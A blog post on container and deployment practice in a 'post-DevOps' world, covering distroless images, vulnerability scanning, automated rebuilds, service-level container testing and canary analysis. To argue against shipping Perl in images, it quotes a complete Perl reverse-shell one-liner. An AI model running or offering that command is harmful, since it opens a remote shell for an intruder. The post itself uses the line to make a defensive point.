Infrastructure in this post-DevOps world?

“Those who cannot remember the past are condemned to repeat it” - Jorge Santayana

Those who remember the past repeat it too, though may not be condemned to. As containers are merely the same bad bash scripts that used to run the Internet in the ’90s and 2000s (who remembers cutting and pasting bash commands out of word docs?), complete with the same running things as root, and trying to work out exactly which library you need to manually include to make the chroot() work.

Given that even the tiniest static blog, now require Kubernetes by default, what does this look like for how we build and deploy [predominantly] web infrastructure. And seeing as we’re trying to be in vogue, what does that mean for our exciting world of post-DevOps?

Everyone wants a platform for good™

Everyone wants 2010 Heroku, or at least the thing they want turns out to have already been built by Heroku. (Including SalesForce I imagine) What do I mean by this? A platform as a service. Due to the ever increasing complexity of the ball of string we refer to as modern infrastructure, many are moving back to more specialised areas. Developers are wanting to write code and run it. Infrastructure people with whatever they’re called this week (the “SRE” to “sysadmin” sliding scale of pay) want to write yaml, no, run Kubernetes so they can get a new job build and run reliable infrastructure. DBREs/DBAs just want a break.

Developers don’t want to be trying to maintain Dockerfiles and staying on top of Linux CVEs (who does?), Infrastructureians want to stop having every single system they maintain be different and unique, they want to look after cattle, and not pets.

Security people? I don’t know what you’ll want any more. Its probably the same thing as 10 years ago, just rebranded with basic but outdated container support. It would be good if they wanted something that lined up with the rest of engineering, and they can by embracing change, not by pushing against it.

Security often makes businesses slower. The incredible Kelly Shortridge has written extensively about Security Obstructionism and how the way security teams function, whether by choice or not, is to slow down or block innovation and development. I personally don’t feel this is as intentional as it seems, and is often a symptom of vastly differing incentives and expectations, rather than a base desire of every security team, but the outcome is still the same, slowed down development at best, and security cut out of loop at worst.

Container images should be wee!

In the beginning (okay much later) Docker was created. This has made a lot of people very angry and been widely regarded as a bad move

Over the years people have migrated from using giant images such as the oracle/database 13.2GB, to container specific versions of mainstream Oses such as Ubuntu Core, then down the smol and much loved Alpine.

The hotness du jour is Distroless (congratulations, you’ve reinvented using chroot from 1997), where the goal is to have no userland you don’t need in the image. For compiled applications like Go, Rust and the likes this is easy as they do/can spit out static binaries so you don’t have to worry about libraries (as a whole). They can contain as little as ca-certificates, /etc/passwd , /tmp, and tzdata!

% docker inspect | jq '.[0].Size' | numfmt --to iec --format "%.2f"

Yeah the entire container would fit on two floppy disks.

For something like Python it’s harder, and rubby, well, that project got abandoned

Why is this important? It’s not like anyone is running low on hard drive space? Well ignoring strange articles from RedHat smaller images build quicker, deploy quicker, get vuln scanned quicker. You want these feedback cycles to be as quick as possible, so if anything goes wrong you don’t have to wait and context switch. When you’re spinning up 100s or even 1000s of a container in production, the time taken for a 5mb image vs a 50mb image vs a 500mb image becouse something you can notice. In cases of roll-backs (if you believe in them), seconds count.

And yeah, there’s some security differences between the 2mb and the 120mb versions of the two base containers, as you’d expect.

% docker scan


Package manager:   deb
Project name:      docker-image|
Docker image:
Platform:          linux/amd64

✔ Tested 3 dependencies for known vulnerabilities, no vulnerable paths found.

% docker scan debian:11

Testing debian:11...

Package manager:   deb
Project name:      docker-image|debian
Docker image:      debian:11
Platform:          linux/amd64
Base image:        debian:11.2

Tested 97 dependencies for known vulnerabilities, found 43 vulnerabilities.

According to our scan, you are currently using the most secure version of the selected base image

Things that are in this example list of vulnerabilities: systemd/libsystemd0 which we shouldn’t be running in a container, krb5/libk5crypto3 for all the Kerberos everyone does in their containers, high severity vulnerabilities in perl/perl-base which again, why do we need an entire scripting language in a container?

perl -e 'use Socket; $i=""; $p=1234; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};'

isn’t going to run itself?

Fewer packages to be outdated (mmm compliance), fewer packages that have security vulnerabilities that someone needs to worry about, which also leads to updating it less, so even if you believe in none of the rest of this then fewer updates is fewer changes.

Automatic Rebuilding

I’ve built or maintained many systems that tell developers they need to upgrade one thing or another, and one common element in all of them is that absolutely no one wants to.

✨✨Developers, by and large, should not have to care about CVEs!✨✨

A platform first world, where developers don’t really have to know what base OS their container is on. They ship their very standard code to the repo. Library and code scanning can be in IDE (Synk)(VS Code is the way it seems, no vim support? 😢) or once it hits the repo with something like Github Code Scanning or Dependabot which if you’ve used JitHub, you’ve probably already seen. The advantage of CI/Repo side scanning vs. later in any pipelines is the closer to the actual code (as in editor, or PR) you can get the “you need to upgrade this library” the more likely it is to happen and the implications of it more easily understood. An email a week from now saying “you need to upgrade this library” against a before you even push the code notification (from the IDE, git push hook, PR Dependabit, etc), I know which one most developers would prefer, okay maybe not prefer, but are more likely to action. In a more perfect world, a system that when there’s a CVE it upgrades the library in your Gemfile/Pipfile/Cargo.toml etc, then rebuilds, re-tests and all that other good stuff we’ve talked about. If that all works, then the PR is automatically raised. The dream.

A lot of this does get harder the more “jazz” your engineering is. For example, trying to get rubby to compile with libv8 is next to impossible, let alone getting it to happen with an automated set of tests. Whereas a Rust or Golang static binary that can be added to a 2mb container is a lot easier and safer. Your mileage will vary.

But again again again, this needs to be an engineering wide move, and it won’t ever be overnight. Shifting how your structure and build your applications, and where they interface with each layer (application, libraries, OS, containers, which of the 2-3 clouds your k8s runs on) is as bigger shift for many as when Agile was cool, or people tried to pronounce Kanban properly.

Testing your code vs. testing your service

Remember about a decade ago, as infrastructure was moving from running on a single server, to running on multiple, load balanced servers with N+at-least-one? People slowly started to realise that the business didn’t care if a server was up, or if httpd was running on a host, the business cared if the service/website/whatever it was still worked? And slowly people migrated their Nagios configs to not instantly page the moment a single host out of a web cluster had the slightest problem.

As our development and our deployment models have shifted, a lot of our testing hasn’t. Most CI that I’ve experienced happily goes off and runs all your spec tests, then some integration tests, then slaps that on a container and ships it off to your container registry to be deployed.

You’ve tested the code, and some of the application, but you haven’t tested the service/the container, the actual thing you’re running as a whole. Despite my diligent subscription to Gareth Rushgrove’s Devops weekly I haven’t found an amazing answer for this.

Why is this important if the tests work? Well, it depends how, where and when you do your testing. For example, many languages' dependency management tools allow you specify “install these for testing” and “install these for production”. Bundler, everyone’s favourite rubby tool, has Deployment Mode and it’s commonplace to not install all of your testing frameworks in your final image. So you have the thing you test, and then the thing you ship, and they are not the same. This gets harder still for compiled languages. Rust’s Cargo.toml can have build-dependencies and dev-dependencies (example from dog) and Golang does something similar, it just works on Plan9 by default.

The advantage of having something that tests the “service” is that it allows automation safely. When I worked at a questionable startup in the mid 2000s. Every month or so when we did a deployment our collection of ever evolving bash scripts had thrown some jars on to some web services and restarted Tomcat, we’d go and browse the fresh new web site to go see if it worked before opening it up to the world. This was a monolithic Java app running a website. If you are doing this in 2022 you need to look for a new job. If you are deploying once every few months, you probably don’t need to worry about “Post DevOps” 😄.

Deploy agility: “But we deploy 4 days a week!”

So you can only deploy 57% of the time? Nowhere else in the software engineering world is that a good metric. Anyway.

As my Marmite like friend, the ever expressive Charity Majors, writes in Deploys: It’s not actually about Friday:

It’s not about Fridays. It’s about having a healthy ecosystem and feedback loop where you trust your deploys, where deploys aren’t a big deal

Which of these two statements fill you with more confidence?

  1. “the code tests passed, so the code must be good”
  2. “the new deploy container runs the same as the current one”

I know which one I’d pick to deploy. Even on a Friday.

“Just add more tests” alone will not save you

Just as DevOps wasn’t “just use Chef and git”, this isn’t just add some new tests, this is a shift in how you design, build and deploy applications. You have to be able to have isolated testable microservices, ideally with a common API/interface between them (unless you want to spend all your time writing custom tests). You need to expose the parts of your application that you need confidence to something that can test them from the outside. The “click around the website” model of the Java app I spoke of earlier is not reproducible (I swear if anyone mentions Selenium as a “solution”, I will turn this car around).

If all your applications expose a common REST/HTTP endpoint that is able to have tests ran against it in the codepaths you need confidence in, you can now run the entire container/service through CI and have that confidence expressed to you.

Deeper testing of infrastructure components

Here’s an example of a contrived infrastructure component being tested, which I find has even fewer and less options for testing than their programming language counterpart. (If you suggest Server Spec or InSpec then we are not friends.)

The stages commonly seen:

  1. It built!
  2. it built and the thing we want kinda works?
% docker run --rm newhaproxyimg haproxy -v \
    ; echo $?
HAProxy version 2.5.1-86b093a 2022/01/11 -
Status: stable branch - will stop receiving fixes around Q1 2023.
Known bugs:
Running on: Linux 5.10.76-linuxkit #1 SMP Mon Nov 8 10:21:19 UTC 2021 x86_64
  1. It built and it says a config is okay.
% cat haproxy.config | docker run --rm newhaproxyimg haproxy -f /dev/stdin -c -v
HAProxy version 2.5.1-86b093a 2022/01/11 -
Status: stable branch - will stop receiving fixes around Q1 2023.
Known bugs:
Running on: Linux 5.10.76-linuxkit #1 SMP Mon Nov 8 10:21:19 UTC 2021 x86_64
  1. To, we spun up a web server, put haproxy in front of it, and attempt to GET a file through it.

docker create -v /local --name local alpine:latest /bin/true
docker create -v /web --name web alpine:latest /bin/true
docker cp test/test.cfg local:/local
docker cp test/ok.html web:/web

# Run haproxy
docker run --detach --volumes-from local --name haproxy --rm newhaproxyimg haproxy -f /local/test.cfg -dW -V

# Run a busybox web server
docker run --detach --network container:haproxy --name httpd --volumes-from web --rm alpine:latest \
    sh -c 'apk add busybox-extras && /usr/sbin/httpd -v -f -p 8000 -h /web'

docker run --network container:haproxy --rm curlimages/curl curl -v -4 --show-error ''

You can see as the testing progresses, we can gain more and more confidence that the container we intend to ship will do what we expect. This increase of confidence empowers us to deploy this image automatically, without constant human review.

Why do the canaries keep dying in our coal mine?

Canary analysis was initially a manual process for engineers at Netflix… Needless to say, this approach didn’t scale and was not reliable.

Now you have your container widget, you finally get to deploy it, yay, but in honour of everything old being new again, we’re going to talk about blue/green deployments, sorry I mean “automated canary analysis”.

The difference again here is automation. Rather than the “press the swap over to the green cluster” button, we have our CI flow building trust that what we have isn’t going to instantly break the moment you deploy it. Then the automated canaries get deployed in a small subset, which is then monitored and compared to baseline instances of the same application. This, again, requires your applications/systems to be providing accessible metrics and APIs for this introspection. This has to be a move that is done as a group, if you want it to succeed. It’s so much harder to have one team acting solely on their own (regardless of whether they’re a dev, ops, sre, security, janitor, whatever team), you still need to move together as a group to build these systems together. This isn’t a return to “throwing code over the wall”, it’s moving on to building systems together by being experts in your domain.

An artist’s approximation of a conclusion

As we move in to whatever this era is called this time, and what got us here, won’t get us there, if that’s where we decide to go. In a move shocking no one, complexity is being added, not taken away, and our Glorious Kubernetes Future is YAML rich and feels inescapable, even if no one is able to actually tell you what value it actually provides. How we operate looks set to compartmentalise, rather than isolate teams, as owning “the whole stack” becomes more and more impossible, at least until the tooling evolves. Teams will still need to work with each, I’m hopefully obviously not saying we’re heading back to the dark pre DevOps days, merely that responsibilities will get more delimitation and even more standardisation, you know, like Heroku did in 2009! 😸

Further reading

I’m reluctant to say “use this tool” but here’s some tools, and a lot more not tools that continue these ideas, or I just plain stole them from in the first place.

Also a shameless plug for more controversial takes on how the future could all be better: